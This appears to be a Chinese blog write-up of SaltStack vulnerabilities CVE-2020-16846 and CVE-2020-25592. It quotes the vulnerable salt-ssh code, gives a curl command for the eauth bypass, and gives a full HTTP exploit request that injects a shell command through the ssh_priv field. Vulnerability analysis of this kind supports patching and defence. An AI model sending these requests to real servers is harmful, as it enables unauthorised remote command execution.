SaltStack多个高危漏洞

发布于 2020-11-04  404 次阅读


SaltStack官方于11月3日发布Salt安全更新,以解决三个关键漏洞。通过未授权验证绕过和命令注入可造成RCE

CVE-2020-16846

可利用Shell注入(shell injection)获取SSH连接,从而在Salt-API上执行任意命令。

漏洞详情

https://github.com/saltstack/salt/blob/v3000/salt/client/ssh/shell.py第49行

def gen_key(path):
    '''
    Generate a key for use with salt-ssh
    '''
    cmd = 'ssh-keygen -P "" -f {0} -t rsa -q'.format(path)
    if not os.path.isdir(os.path.dirname(path)):
        os.makedirs(os.path.dirname(path))
    subprocess.call(cmd, shell=True)

调用gen_key的仅有

https://github.com/saltstack/salt/blob/v3000/salt/client/ssh/init.py#L261第261行

if priv != 'agent-forwarding':
    if not os.path.isfile(priv):
        try:
            salt.client.ssh.shell.gen_key(priv)
        except OSError:

在创建SSH对象时能命令注入

而https://github.com/saltstack/salt/blob/v3000/salt/client/ssh/client.py#L64第64行

关于call(cmd, shell=True)可以参考https://docs.python.org/2/library/subprocess.html#frequently-used-arguments

CVE-2020-25592

Salt 在验证 eauth 凭据和访问控制列表 ACL 时存在一处验证绕过漏洞,Salt-netapi不正确地验证了eauth凭据和令牌。

漏洞详情

参考大佬给的两个链接

https://github.com/saltstack/salt/commit/daa39c58370641913aa8d5a7a0f44254973dd66b#diff-6d5cc913690a33d019c14883b0d43cf49166660822d8de8264f0352f40df473a

https://github.com/saltstack/salt/commit/daa39c58370641913aa8d5a7a0f44254973dd66b#diff-321216b82b52dc7fbe81d57d907cdafb190af0df6f273eea4879450da8c48293R467-R478

其实链接中已经很清楚了,bypass认证

curl -sSk https://ip:8000/run  -H "Accept: application/x-yaml" -d roster=cache -d fun=xx -d client=ssh -d tgt=localhost  -d eauth=xx

这里有个坑点,tgt写localhost没问题,如果要写127.0.0.1需要加引号。

RCE

exp代码

POST /run HTTP/1.1
Host: ip:8000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Accept: application/x-yaml
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079

client=ssh&tgt=localhost&fun=xx&eauth=xx&ssh_priv=ki9mu|id>/tmp/ki9mu

参考链接:

https://github.com/saltstack/salt/commit/daa39c58370641913aa8d5a7a0f44254973dd66b#diff-6d5cc913690a33d019c14883b0d43cf49166660822d8de8264f0352f40df473a

https://github.com/saltstack/salt/commit/daa39c58370641913aa8d5a7a0f44254973dd66b#diff-321216b82b52dc7fbe81d57d907cdafb190af0df6f273eea4879450da8c48293R467-R478


game to game, not win